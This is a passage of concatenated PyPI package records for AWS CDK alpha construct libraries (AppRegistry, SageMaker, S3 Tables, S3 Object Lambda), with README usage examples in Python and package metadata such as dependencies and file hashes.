resources at scale. ```python import aws_cdk.aws_servicecatalogappregistry_alpha as appreg ``` ## Application An AppRegistry application enables you to define your applications and associated resources. The application name must be unique at the account level and it's immutable. ```python application = appreg.Application(self, "MyFirstApplication", application_name="MyFirstApplicationName", description="description for my application" ) ``` An application that has been created outside of the stack can be imported into your CDK app. Applications can be imported by their ARN via the `Application.fromApplicationArn()` API: ```python imported_application = appreg.Application.from_application_arn(self, "MyImportedApplication", "arn:aws:servicecatalog:us-east-1:012345678910:/applications/0aqmvxvgmry0ecc4mjhwypun6i") ``` ## Application-Associator `ApplicationAssociator` defines an AppRegistry application to contain all the stacks in deployed through your cdk package. This helps to manage all the cdk deployed resources. ### Create a new application to associate all the stacks in the cdk.App scope If you want to create an Application named `MyAssociatedApplication` in account `123456789012` and region `us-east-1` and want to associate all stacks in the `App` scope to `MyAssociatedApplication`, then use as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # AWS Account and Region that are implied by the current CLI configuration is the default env=Environment(account="123456789012", region="us-east-1") )] ) ``` This will create a stack `MyAssociatedApplicationStack` containing an application `MyAssociatedApplication` with the `TagKey` as `managedBy` and `TagValue` as `CDK_Application_Associator`. By default, the stack will have System Managed Application Manager console URL as its output for the application created. If you want to remove the output, then use as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # Disables emitting Application Manager url as output emit_application_manager_url_as_output=False, # AWS Account and Region that are implied by the current CLI configuration is the default env=Environment(account="123456789012", region="us-east-1") )] ) ``` ### Import existing application to associate all the stacks in the cdk.App scope If you want to re-use an existing Application with ARN: `arn:aws:servicecatalog:us-east-1:123456789012:/applications/applicationId` and want to associate all stacks in the `App` scope to your imported application, then use as shown in the example below: ```python app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.existing_application_from_arn( application_arn_value="arn:aws:servicecatalog:us-east-1:123456789012:/applications/applicationId", stack_name="MyAssociatedApplicationStack" )] ) ``` ### Associate attribute group to the application used by `ApplicationAssociator` If you want to associate an Attribute Group with application created by `ApplicationAssociator`, then use as shown in the example below: ```python import aws_cdk as cdk app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # AWS Account and Region that are implied by the current CLI configuration is the default env=cdk.Environment(account="123456789012", region="us-east-1") )] ) # Associate application to the attribute group. associated_app.app_registry_application.add_attribute_group("MyAttributeGroup", attribute_group_name="MyAttributeGroupName", description="Test attribute group", attributes={} ) ``` ### Associate stacks deployed by CDK pipelines If you are using CDK Pipelines to deploy your application, the application stacks will be inside Stages, and ApplicationAssociator will not be able to find them. Call `associateStage` on each Stage object before adding it to the Pipeline, as shown in the example below: ```python import aws_cdk as cdk import aws_cdk.pipelines as codepipeline import aws_cdk.aws_codecommit as codecommit # repo: codecommit.Repository # pipeline: codepipeline.CodePipeline # beta: cdk.Stage class ApplicationPipelineStack(cdk.Stack): def __init__(self, scope, id, *, application, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, application=application, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors) # associate the stage to application associator. application.associate_stage(beta) pipeline.add_stage(beta) app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyPipelineAssociatedApplication", stack_name="MyPipelineAssociatedApplicationStack", env=cdk.Environment(account="123456789012", region="us-east-1") )] ) cdk_pipeline = ApplicationPipelineStack(app, "CDKApplicationPipelineStack", application=associated_app, env=cdk.Environment(account="123456789012", region="us-east-1") ) ``` ### Associate cross-account stack By default, ApplicationAssociator will not perform cross-account stack associations with the target Application, to avoid deployment failures for accounts which have not been setup for cross-account associations. To enable cross-account stack associations, make sure all accounts are in the same organization as the target Application's account and that resource sharing is enabled within the organization. If you wish to turn on cross-account sharing and associations, set the `associateCrossAccountStacks` field to `true`, as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( associate_cross_account_stacks=True, application_name="MyAssociatedApplication", env=Environment(account="123456789012", region="us-east-1") )] ) ``` ### Associate cross-region stack Currently, cross-region stack association is not supported. ## Attribute Group An AppRegistry attribute group acts as a container for user-defined attributes for an application. Metadata is attached in a machine-readable format to integrate with automated workflows and tools. The attribute group name must be unique at the account level and it's immutable. ```python attribute_group = appreg.AttributeGroup(self, "MyFirstAttributeGroup", attribute_group_name="MyFirstAttributeGroupName", description="description for my attribute group", # the description is optional, attributes={ "project": "foo", "team": ["member1", "member2", "member3"], "public": False, "stages": { "alpha": "complete", "beta": "incomplete", "release": "not started" } } ) ``` An attribute group that has been created outside of the stack can be imported into your CDK app. Attribute groups can be imported by their ARN via the `AttributeGroup.fromAttributeGroupArn()` API: ```python imported_attribute_group = appreg.AttributeGroup.from_attribute_group_arn(self, "MyImportedAttrGroup", "arn:aws:servicecatalog:us-east-1:012345678910:/attribute-groups/0aqmvxvgmry0ecc4mjhwypun6i") ``` ## Associations You can associate your appregistry application with attribute groups and resources. Resources are CloudFormation stacks that you can associate with an application to group relevant stacks together to enable metadata rich insights into your applications and resources. A Cloudformation stack can only be associated with one appregistry application. If a stack is associated with multiple applications in your app or is already associated with one, CDK will fail at deploy time. ### Associating application with a new attribute group You can create and associate an attribute group to an application with the `addAttributeGroup()` API: ```python # application: appreg.Application # attribute_group: appreg.AttributeGroup application.add_attribute_group("MyAttributeGroupId", attribute_group_name="MyAttributeGroupName", description="Test attribute group", attributes={} ) ``` ### Associating an attribute group with application You can associate an application with an attribute group with `associateWith`: ```python # application: appreg.Application # attribute_group: appreg.AttributeGroup attribute_group.associate_with(application) ``` ### Associating application with a Stack You can associate a stack with an application with the `associateApplicationWithStack()` API: ```python # application: appreg.Application app = App() my_stack = Stack(app, "MyStack") application.associate_application_with_stack(my_stack) ``` ## Sharing You can share your AppRegistry applications and attribute groups with AWS Organizations, Organizational Units (OUs), AWS accounts within an organization, as well as IAM roles and users. AppRegistry requires that AWS Organizations is enabled in an account before deploying a share of an application or attribute group. ### Sharing an application ```python import aws_cdk.aws_iam as iam # application: appreg.Application # my_role: iam.IRole # my_user: iam.IUser application.share_application("MyShareId", name="MyShare", accounts=["123456789012"], organization_arns=["arn:aws:organizations::123456789012:organization/o-my-org-id"], roles=[my_role], users=[my_user] ) ``` E.g., sharing an application with multiple accounts and allowing the accounts to associate resources to the application. ```python import aws_cdk.aws_iam as iam # application: appreg.Application application.share_application("MyShareId", name="MyShare", accounts=["123456789012", "234567890123"], share_permission=appreg.SharePermission.ALLOW_ACCESS ) ``` ### Sharing an attribute group ```python import aws_cdk.aws_iam as iam # attribute_group: appreg.AttributeGroup # my_role: iam.IRole # my_user: iam.IUser attribute_group.share_attribute_group("MyShareId", name="MyShare", accounts=["123456789012"], organization_arns=["arn:aws:organizations::123456789012:organization/o-my-org-id"], roles=[my_role], users=[my_user] ) ``` E.g., sharing an application with multiple accounts and allowing the accounts to associate applications to the attribute group. ```python import aws_cdk.aws_iam as iam # attribute_group: appreg.AttributeGroup attribute_group.share_attribute_group("MyShareId", name="MyShare", accounts=["123456789012", "234567890123"], share_permission=appreg.SharePermission.ALLOW_ACCESS ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:20.855775
aws_cdk_aws_servicecatalogappregistry_alpha-2.239.0a0.tar.gz
123,908
1b/7f/8c95927b9935800e015074a02394f43b2da8e982bb0d2d47997915acf55f/aws_cdk_aws_servicecatalogappregistry_alpha-2.239.0a0.tar.gz
source
sdist
null
false
195b524bcfc4133b094946429cb62e4e
a5e60755354bdf98c0b7c5944b16d580e117421b7de84756fa74d72ea4315872
1b7f8c95927b9935800e015074a02394f43b2da8e982bb0d2d47997915acf55f
null
[]
0
2.1
aws-cdk.aws-sagemaker-alpha
2.239.0a0
The CDK Construct Library for AWS::SageMaker
# Amazon SageMaker Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon SageMaker provides every developer and data scientist with the ability to build, train, and deploy machine learning models quickly. Amazon SageMaker is a fully-managed service that covers the entire machine learning workflow to label and prepare your data, choose an algorithm, train the model, tune and optimize it for deployment, make predictions, and take action. Your models get to production faster with much less effort and lower cost. ## Model To create a machine learning model with Amazon Sagemaker, use the `Model` construct. This construct includes properties that can be configured to define model components, including the model inference code as a Docker image and an optional set of separate model data artifacts. See the [AWS documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-marketplace-develop.html) to learn more about SageMaker models. ### Single Container Model In the event that a single container is sufficient for your inference use-case, you can define a single-container model: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path image = sagemaker.ContainerImage.from_asset(path.join("path", "to", "Dockerfile", "directory")) model_data = sagemaker.ModelData.from_asset(path.join("path", "to", "artifact", "file.tar.gz")) model = sagemaker.Model(self, "PrimaryContainerModel", containers=[sagemaker.ContainerDefinition( image=image, model_data=model_data ) ] ) ``` ### Inference Pipeline Model An inference pipeline is an Amazon SageMaker model that is composed of a linear sequence of multiple containers that process requests for inferences on data. See the [AWS documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/inference-pipelines.html) to learn more about SageMaker inference pipelines. To define an inference pipeline, you can provide additional containers for your model: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # image1: sagemaker.ContainerImage # model_data1: sagemaker.ModelData # image2: sagemaker.ContainerImage # model_data2: sagemaker.ModelData # image3: sagemaker.ContainerImage # model_data3: sagemaker.ModelData model = sagemaker.Model(self, "InferencePipelineModel", containers=[sagemaker.ContainerDefinition(image=image1, model_data=model_data1), sagemaker.ContainerDefinition(image=image2, model_data=model_data2), sagemaker.ContainerDefinition(image=image3, model_data=model_data3) ] ) ``` ### Model Properties #### Network Isolation If you enable [network isolation](https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html), the containers can't make any outbound network calls, even to other AWS services such as Amazon S3. Additionally, no AWS credentials are made available to the container runtime environment. To enable network isolation, set the `networkIsolation` property to `true`: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # image: sagemaker.ContainerImage # model_data: sagemaker.ModelData model = sagemaker.Model(self, "ContainerModel", containers=[sagemaker.ContainerDefinition( image=image, model_data=model_data ) ], network_isolation=True ) ``` ### Container Images Inference code can be stored in the Amazon EC2 Container Registry (Amazon ECR), which is specified via `ContainerDefinition`'s `image` property which accepts a class that extends the `ContainerImage` abstract base class. #### Asset Image Reference a local directory containing a Dockerfile: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path image = sagemaker.ContainerImage.from_asset(path.join("path", "to", "Dockerfile", "directory")) ``` #### ECR Image Reference an image available within ECR: ```python import aws_cdk.aws_ecr as ecr import aws_cdk.aws_sagemaker_alpha as sagemaker repository = ecr.Repository.from_repository_name(self, "Repository", "repo") image = sagemaker.ContainerImage.from_ecr_repository(repository, "tag") ``` #### DLC Image Reference a deep learning container image: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker repository_name = "huggingface-pytorch-training" tag = "1.13.1-transformers4.26.0-gpu-py39-cu117-ubuntu20.04" image = sagemaker.ContainerImage.from_dlc(repository_name, tag) ``` ### Model Artifacts If you choose to decouple your model artifacts from your inference code (as is natural given different rates of change between inference code and model artifacts), the artifacts can be specified via the `modelData` property which accepts a class that extends the `ModelData` abstract base class. The default is to have no model artifacts associated with a model. #### Asset Model Data Reference local model data: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path model_data = sagemaker.ModelData.from_asset(path.join("path", "to", "artifact", "file.tar.gz")) ``` #### S3 Model Data Reference an S3 bucket and object key as the artifacts for a model: ```python import aws_cdk.aws_s3 as s3 import aws_cdk.aws_sagemaker_alpha as sagemaker bucket = s3.Bucket(self, "MyBucket") model_data = sagemaker.ModelData.from_bucket(bucket, "path/to/artifact/file.tar.gz") ``` ## Model Hosting Amazon SageMaker provides model hosting services for model deployment. Amazon SageMaker provides an HTTPS endpoint where your machine learning model is available to provide inferences. ### Endpoint Configuration By using the `EndpointConfig` construct, you can define a set of endpoint configuration which can be used to provision one or more endpoints. In this configuration, you identify one or more models to deploy and the resources that you want Amazon SageMaker to provision. You define one or more production variants, each of which identifies a model. Each production variant also describes the resources that you want Amazon SageMaker to provision. If you are hosting multiple models, you also assign a variant weight to specify how much traffic you want to allocate to each model. For example, suppose that you want to host two models, A and B, and you assign traffic weight 2 for model A and 1 for model B. Amazon SageMaker distributes two-thirds of the traffic to Model A, and one-third to model B: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model_a: sagemaker.Model # model_b: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model_a, variant_name="modelA", initial_variant_weight=2 ), sagemaker.InstanceProductionVariantProps( model=model_b, variant_name="variantB", initial_variant_weight=1 ) ] ) ``` #### Container Startup Health Check Timeout You can specify a timeout value for your inference container to pass health check by configuring the `containerStartupHealthCheckTimeout` property. This is useful when your model takes longer to initialize and you want to avoid premature health check failures: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model, variant_name="my-variant", container_startup_health_check_timeout=cdk.Duration.minutes(5) ) ] ) ``` The timeout value must be between 60 seconds and 1 hour (3600 seconds). If not specified, Amazon SageMaker uses the default timeout behavior. ### Serverless Inference Amazon SageMaker Serverless Inference is a purpose-built inference option that makes it easy for you to deploy and scale ML models. Serverless endpoints automatically launch compute resources and scale them in and out depending on traffic, eliminating the need to choose instance types or manage scaling policies. For more information, see [SageMaker Serverless Inference](https://docs.aws.amazon.com/sagemaker/latest/dg/serverless-endpoints.html). To create a serverless endpoint configuration, use the `serverlessProductionVariant` property: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "ServerlessEndpointConfig", serverless_production_variant=sagemaker.ServerlessProductionVariantProps( model=model, variant_name="serverlessVariant", max_concurrency=10, memory_size_in_mB=2048, provisioned_concurrency=5 ) ) ``` Serverless inference is ideal for workloads with intermittent or unpredictable traffic patterns. You can configure: * `maxConcurrency`: Maximum concurrent invocations (1-200) * `memorySizeInMB`: Memory allocation in 1GB increments (1024, 2048, 3072, 4096, 5120, or 6144 MB) * `provisionedConcurrency`: Optional pre-warmed capacity to reduce cold starts **Note**: Provisioned concurrency incurs charges even when the endpoint is not processing requests. Use it only when you need to minimize cold start latency. You cannot mix serverless and instance-based variants in the same endpoint configuration. ### Endpoint When you create an endpoint from an `EndpointConfig`, Amazon SageMaker launches the ML compute instances and deploys the model or models as specified in the configuration. To get inferences from the model, client applications send requests to the Amazon SageMaker Runtime HTTPS endpoint. For more information about the API, see the [InvokeEndpoint](https://docs.aws.amazon.com/sagemaker/latest/dg/API_runtime_InvokeEndpoint.html) API. Defining an endpoint requires at minimum the associated endpoint configuration: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # endpoint_config: sagemaker.EndpointConfig endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) ``` ### AutoScaling To enable autoscaling on the production variant, use the `autoScaleInstanceCount` method: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model variant_name = "my-variant" endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model, variant_name=variant_name ) ] ) endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) production_variant = endpoint.find_instance_production_variant(variant_name) instance_count = production_variant.auto_scale_instance_count( max_capacity=3 ) instance_count.scale_on_invocations("LimitRPS", max_requests_per_second=30 ) ``` For load testing guidance on determining the maximum requests per second per instance, please see this [documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/endpoint-scaling-loadtest.html). ### Metrics To monitor CloudWatch metrics for a production variant, use one or more of the metric convenience methods: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # endpoint_config: sagemaker.EndpointConfig endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) production_variant = endpoint.find_instance_production_variant("my-variant") production_variant.metric_model_latency().create_alarm(self, "ModelLatencyAlarm", threshold=100000, evaluation_periods=3 ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:19.934270
aws_cdk_aws_sagemaker_alpha-2.239.0a0.tar.gz
180,400
2f/cd/f4bffd71297c6b7fa6776733dcab6ea5b421c0343b2669d4c3788e0c6716/aws_cdk_aws_sagemaker_alpha-2.239.0a0.tar.gz
source
sdist
null
false
0436c2670450744ebcafd6c2fa208f4e
08b843ff7d8379eff5be8898ab18309fbf3dcc3909092829ce7280fdadbf6e45
2fcdf4bffd71297c6b7fa6776733dcab6ea5b421c0343b2669d4c3788e0c6716
null
[]
0
2.1
aws-cdk.aws-s3tables-alpha
2.239.0a0
CDK Constructs for S3 Tables
# Amazon S3 Tables Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## Amazon S3 Tables Amazon S3 Tables deliver the first cloud object store with built-in Apache Iceberg support and streamline storing tabular data at scale. [Product Page](https://aws.amazon.com/s3/features/tables/) | [User Guide](https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-tables.html) ## Usage ### Define an S3 Table Bucket ```python from aws_cdk.aws_s3tables_alpha import UnreferencedFileRemoval # Build a Table bucket sample_table_bucket = TableBucket(scope, "ExampleTableBucket", table_bucket_name="example-bucket-1", # optional fields: unreferenced_file_removal=UnreferencedFileRemoval( status=UnreferencedFileRemovalStatus.ENABLED, noncurrent_days=20, unreferenced_days=20 ) ) ``` ### Define an S3 Tables Namespace ```python # Build a namespace sample_namespace = Namespace(scope, "ExampleNamespace", namespace_name="example-namespace-1", table_bucket=table_bucket ) ``` ### Define an S3 Table ```python from aws_cdk.aws_s3tables_alpha import IcebergMetadataProperty, IcebergSchemaProperty, SchemaFieldProperty, SchemaFieldProperty, CompactionProperty, SnapshotManagementProperty # Build a table sample_table = Table(scope, "ExampleTable", table_name="example_table", namespace=namespace, open_table_format=OpenTableFormat.ICEBERG, without_metadata=True ) # Build a table with an Iceberg Schema sample_table_with_schema = Table(scope, "ExampleSchemaTable", table_name="example_table_with_schema", namespace=namespace, open_table_format=OpenTableFormat.ICEBERG, iceberg_metadata=IcebergMetadataProperty( iceberg_schema=IcebergSchemaProperty( schema_field_list=[SchemaFieldProperty( name="id", type="int", required=True ), SchemaFieldProperty( name="name", type="string" ) ] ) ), compaction=CompactionProperty( status=Status.ENABLED, target_file_size_mb=128 ), snapshot_management=SnapshotManagementProperty( status=Status.ENABLED, max_snapshot_age_hours=48, min_snapshots_to_keep=5 ) ) ``` Learn more about table buckets maintenance operations and default behavior from the [S3 Tables User Guide](https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-table-buckets-maintenance.html) ### Controlling Table Bucket Permissions ```python # Grant the principal read permissions to the bucket and all tables within account_id = "123456789012" table_bucket.grant_read(iam.AccountPrincipal(account_id), "*") # Grant the role write permissions to the bucket and all tables within role = iam.Role(stack, "MyRole", assumed_by=iam.ServicePrincipal("sample")) table_bucket.grant_write(role, "*") # Grant the user read and write permissions to the bucket and all tables within table_bucket.grant_read_write(iam.User(stack, "MyUser"), "*") # Grant permissions to the bucket and a particular table within it table_id = "6ba046b2-26de-44cf-9144-0c7862593a7b" table_bucket.grant_read_write(iam.AccountPrincipal(account_id), table_id) # Add custom resource policy statements permissions = iam.PolicyStatement( effect=iam.Effect.ALLOW, actions=["s3tables:*"], principals=[iam.ServicePrincipal("example.aws.internal")], resources=["*"] ) table_bucket.add_to_resource_policy(permissions) ``` ### Controlling Table Bucket Encryption Settings S3 TableBuckets have SSE (server-side encryption with AES-256) enabled by default with S3 managed keys. You can also bring your own KMS key for KMS-SSE or have S3 create a KMS key for you. If a bucket is encrypted with KMS, grant functions on the bucket will also grant access to the TableBucket's associated KMS key. ```python # Provide a user defined KMS Key: key = kms.Key(scope, "UserKey") encrypted_bucket = TableBucket(scope, "EncryptedTableBucket", table_bucket_name="table-bucket-1", encryption=TableBucketEncryption.KMS, encryption_key=key ) # This account principal will also receive kms:Decrypt access to the KMS key encrypted_bucket.grant_read(iam.AccountPrincipal("123456789012"), "*") # Use S3 managed server side encryption (default) encrypted_bucket_default = TableBucket(scope, "EncryptedTableBucketDefault", table_bucket_name="table-bucket-3", encryption=TableBucketEncryption.S3_MANAGED ) ``` When using KMS encryption (`TableBucketEncryption.KMS`), if no encryption key is provided, CDK will automatically create a new KMS key for the table bucket with necessary permissions. ```python # If no key is provided, one will be created automatically encrypted_bucket_auto = TableBucket(scope, "EncryptedTableBucketAuto", table_bucket_name="table-bucket-2", encryption=TableBucketEncryption.KMS ) ``` ### Controlling Table Permissions ```python # Grant the principal read permissions to the table account_id = "123456789012" table.grant_read(iam.AccountPrincipal(account_id)) # Grant the role write permissions to the table role = iam.Role(stack, "MyRole", assumed_by=iam.ServicePrincipal("sample")) table.grant_write(role) # Grant the user read and write permissions to the table table.grant_read_write(iam.User(stack, "MyUser")) # Grant an account permissions to the table table.grant_read_write(iam.AccountPrincipal(account_id)) # Add custom resource policy statements permissions = iam.PolicyStatement( effect=iam.Effect.ALLOW, actions=["s3tables:*"], principals=[iam.ServicePrincipal("example.aws.internal")], resources=["*"] ) table.add_to_resource_policy(permissions) ``` ## Coming Soon L2 Construct support for: * KMS encryption support for Tables
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:19.126214
aws_cdk_aws_s3tables_alpha-2.239.0a0.tar.gz
128,599
21/53/fc54a31f1643556df1baa46dd68dfcd082f293bdcce6d6458b0bb15fc72a/aws_cdk_aws_s3tables_alpha-2.239.0a0.tar.gz
source
sdist
null
false
957cc8d839d7b5ba753f3e92411fff7d
33f916c9df85205261d12dfecbfc51269d13db79e61ae9ee96791b02bf768d10
2153fc54a31f1643556df1baa46dd68dfcd082f293bdcce6d6458b0bb15fc72a
null
[]
0
2.1
aws-cdk.aws-s3objectlambda-alpha
2.239.0a0
The CDK Construct Library for AWS::S3ObjectLambda
# AWS::S3ObjectLambda Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This construct library allows you to define S3 object lambda access points. ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", payload={ "prop": "value" } ) ``` ## Handling range and part number requests Lambdas are currently limited to only transforming `GetObject` requests. However, they can additionally support `GetObject-Range` and `GetObject-PartNumber` requests, which needs to be specified in the access point configuration: ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", supports_get_object_range=True, supports_get_object_part_number=True ) ``` ## Pass additional data to Lambda function You can specify an additional object that provides supplemental data to the Lambda function used to transform objects. The data is delivered as a JSON payload to the Lambda: ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", payload={ "prop": "value" } ) ``` ## Accessing the S3 AccessPoint ARN If you need access to the s3 accesspoint, you can get its ARN like so: ```python import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda # access_point: s3objectlambda.AccessPoint s3_access_point_arn = access_point.s3_access_point_arn ``` This is only supported for AccessPoints created in the stack - currently you're unable to get the S3 AccessPoint ARN for imported AccessPoints. To do that you'd have to know the S3 bucket name beforehand.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:18.466474
aws_cdk_aws_s3objectlambda_alpha-2.239.0a0.tar.gz
54,541
82/62/4838acf80480d1a9410836c66cdea4743c134cbe700470b0f223288553a6/aws_cdk_aws_s3objectlambda_alpha-2.239.0a0.tar.gz
source
sdist
null
false
5aca3a468ab0aa3b1b7bea7b998da054
843beb235b984ad58049227d981de8731de7a5d45cf713a62361bddfece4584f
82624838acf80480d1a9410836c66cdea4743c134cbe700470b0f223288553a6
null
[]
0
2.1
aws-cdk.aws-route53resolver-alpha
2.239.0a0
